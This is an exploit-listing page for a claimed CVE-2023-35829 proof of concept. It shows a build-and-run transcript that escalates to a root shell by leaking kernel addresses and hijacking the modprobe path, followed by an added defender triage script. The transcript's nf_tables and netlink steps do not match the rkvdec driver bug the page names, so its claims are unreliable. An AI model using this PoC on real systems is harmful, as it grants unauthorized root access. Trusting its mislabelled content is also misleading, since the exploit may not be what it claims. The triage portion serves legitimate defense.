## https://sploitus.com/exploit?id=16C221AA-DEE3-5FD2-B61C-2D141098AD3E
# CVE-2023-35829-poc
CVE-2023-35829: in the Linux kernel before 6.3.2, a use-after-free was found in `rkvdec_remove` in `drivers/staging/media/rkvdec/rkvdec.c`.

# Usage

```
chris@experience:~/CVE-2023-35829-poc# make
cc -pthread -static -o poc obj/keyring.o obj/main.o obj/modprobe.o obj/netlink.o obj/nf_tables.o obj/simple_xattr.o obj/uring.o obj/util.o
strip poc
cc -o get_root get_root_src/get_root.c
rm -fr get_root
chris@experience:~/CVE-2023-35829-poc# ./poc
[+] CVE-2023-35829 PoC
[+] Second process currently waiting
[+] Get CAP_NET_ADMIN capability
[+] Netlink socket created
[+] Netlink socket bound
[+] Table table created
[+] Set for the leak created
[+] Set for write primitive created
[+] Leak succeed
[+] kaslr base found 0xffffffff9f000000
[+] physmap base found 0xffff910a00000000
[+] modprobe path changed !
[+] Modprobe payload setup
[?] waitpid
[?] sem_post
[+++] Got root shell, should exit?
# id
uid=0(root) gid=0(root) groups=0(root)
```
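
A defender-side triage script for the advisory and transcript above, added here and not part of the PoC repository: it compares the running release against the fixed version 6.3.2, checks whether an rkvdec driver is registered, and verifies that `kernel.modprobe` still holds its default, since the transcript reports `modprobe path changed`. The sysfs driver name `rkvdec`, the default `/sbin/modprobe` and all function names are assumptions; distribution kernels may carry the fix under an older version string, so treat the version check as a first-pass filter.

```shell
#!/bin/sh
# Added triage example; not part of the PoC repository.
FIXED=6.3.2   # first fixed upstream release, from the advisory text

# kver_lt A B: true when the leading x.y.z of release string A sorts before B.
kver_lt() {
    a=$(printf '%s\n' "$1" | sed 's/^\([0-9][0-9.]*\).*/\1/; s/\.$//')
    [ "$a" = "$2" ] && return 1
    first=$(printf '%s\n%s\n' "$a" "$2" | sort -t. -k1,1n -k2,2n -k3,3n | head -n1)
    [ "$first" = "$a" ]
}

# rkvdec_bound SYSFS_ROOT: true when a platform driver named "rkvdec" is
# registered (assumption: that is the name the staging driver registers under).
rkvdec_bound() {
    [ -d "$1/bus/platform/drivers/rkvdec" ]
}

# modprobe_path_ok FILE [EXPECTED]: true when the kernel.modprobe value in FILE
# equals EXPECTED (default /sbin/modprobe; adjust if your distro differs).
modprobe_path_ok() {
    cur=$(cat "$1" 2>/dev/null) || return 2
    [ "$cur" = "${2:-/sbin/modprobe}" ]
}

# triage RELEASE SYSFS_ROOT MODPROBE_FILE: print one verdict line per check.
triage() {
    if kver_lt "$1" "$FIXED"; then
        if rkvdec_bound "$2"; then echo "kernel $1: pre-$FIXED, rkvdec present: patch"
        else echo "kernel $1: pre-$FIXED, rkvdec absent: not reachable here"; fi
    else
        echo "kernel $1: at or after $FIXED"
    fi
    if modprobe_path_ok "$3"; then echo "kernel.modprobe: default"
    else echo "kernel.modprobe: changed or unreadable, investigate"; fi
    return 0
}

triage "$(uname -r)" /sys /proc/sys/kernel/modprobe
```

A changed `kernel.modprobe` value does not survive a reboot, so run the check on the live host before restarting it.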